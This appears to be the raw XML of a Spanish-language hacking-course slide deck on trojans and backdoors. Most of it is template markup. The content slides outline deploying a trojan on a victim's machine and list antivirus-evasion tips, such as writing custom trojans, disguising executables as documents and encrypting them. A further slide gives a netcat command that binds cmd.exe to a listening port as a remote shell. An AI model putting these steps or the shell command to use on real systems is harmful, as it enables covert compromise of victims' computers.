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Lst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultText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67" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="1284" y="5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Autofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Haga clic para modificar el estilo de título del patrón</a:t>
            </a:r>
            <a:endParaRPr lang="bs-Latn-BA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3717032"/>
            <a:ext cx="6400800" cy="504056"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ct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bs-Latn-BA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>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5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>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240649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bs-Latn-BA"/>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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>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5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>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1378186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bs-Latn-B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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>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5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>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4194088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19256" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
                <a:cs typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Haga clic para modificar el estilo de título del patrón</a:t>
            </a:r>
            <a:endParaRPr lang="bs-Latn-BA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
                <a:cs typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
                <a:cs typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
                <a:cs typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
                <a:cs typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
                <a:cs typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464840" y="6498803"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
                <a:cs typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{4BEA1FFC-0729-4B4E-874A-BB33F34F7B19}" type="datetimeFigureOut">
              <a:rPr lang="bs-Latn-BA" smtClean="0"/>
              <a:pPr/>
              <a:t>22. 8. 2021.</a:t>
            </a:fld>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3131840" y="6498803"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
                <a:cs typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6560840" y="6498803"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
                <a:cs typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D71A774C-E981-4CCA-AA75-161A658A4D12}" type="slidenum">
              <a:rPr lang="bs-Latn-BA" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2340254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bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="3861048"/>
            <a:ext cx="7772400" cy="432048"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>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5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>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1721858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bs-Latn-B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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>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6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>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896292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bs-Latn-B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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Date Placeholder 6"/>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8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>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2071443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bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>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4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>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2133948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3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>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753561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bs-Latn-B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6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>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800301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bs-Latn-B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a:t>Haga clic en el icono para agregar una imagen</a:t>
            </a:r>
            <a:endParaRPr lang="bs-Latn-B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6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>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148999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19256" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="57000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Haga clic para modificar el estilo de título del patrón</a:t>
            </a:r>
            <a:endParaRPr lang="bs-Latn-BA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1556792"/>
            <a:ext cx="8229600" cy="4569371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="57000"/>
            </a:schemeClr>
          </a:solidFill>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6448251"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{4BEA1FFC-0729-4B4E-874A-BB33F34F7B19}" type="datetimeFigureOut">
              <a:rPr lang="bs-Latn-BA" smtClean="0"/>
              <a:pPr/>
              <a:t>22. 8. 2021.</a:t>
            </a:fld>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6448251"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6448251"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D71A774C-E981-4CCA-AA75-161A658A4D12}" type="slidenum">
              <a:rPr lang="bs-Latn-BA" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="bs-Latn-BA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14131760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5400" b="1" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Microsoft New Tai Lue"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Microsoft New Tai Lue" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Microsoft New Tai Lue"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icrosoft New Tai Lue" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Microsoft New Tai Lue"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icrosoft New Tai Lue" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Microsoft New Tai Lue"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icrosoft New Tai Lue" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Microsoft New Tai Lue"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icrosoft New Tai Lue" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Microsoft New Tai Lue"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050" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>6. Troyanos y Backdoors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" err="1"/>
              <a:t>arpahacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" err="1"/>
              <a:t>julioiglesiasp</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17659240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Desplegar un troyano</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Se crea el software troyano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. Se lo une en un archivo wrapped.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>3. Se lo pone en el equipo de la víctima.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>4. Se instala</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>5. Víctima comprometida</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="899102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Técnicas para evadir antivirus.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Nunca utilizar troyanos descargados desde la web (los antivirus pueden detectarlos fácilmente).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Dividir el archivo troyano en varias piezas y comprimirlas en un archivo simple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>SIEMPRE escribir sus propios troyanos e incrustarlo dentro de una aplicación.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Convertir el .exe en vbscript, doc, ppt, pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Cambiar el contexto del troyano utilizando un editor hex, revisar y cifrar el archivo.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3962780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Tipos de troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Generalmente se los caracteriza por lo que hace, troyanos http, de comando, destructivos, shell, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2628476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Troyanos Command Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Estos troyanos proporcionan control remoto a través de línea de comandos en el equipo de la maquina</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>El servidor troyano es instalado en la maquina virtual de la victima que abre un puerto para que se pueda conectar el atacante. El cliente se instala en el equipo del atacante que ejecuta un command shell en el equipo de la víctima.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5858984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Ejemplo con netcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>nc &lt;ip&gt; &lt;puerto&gt;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>nc -L -p &lt;puerto&gt; -t -e cmd.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6604155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Troyanos Botnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
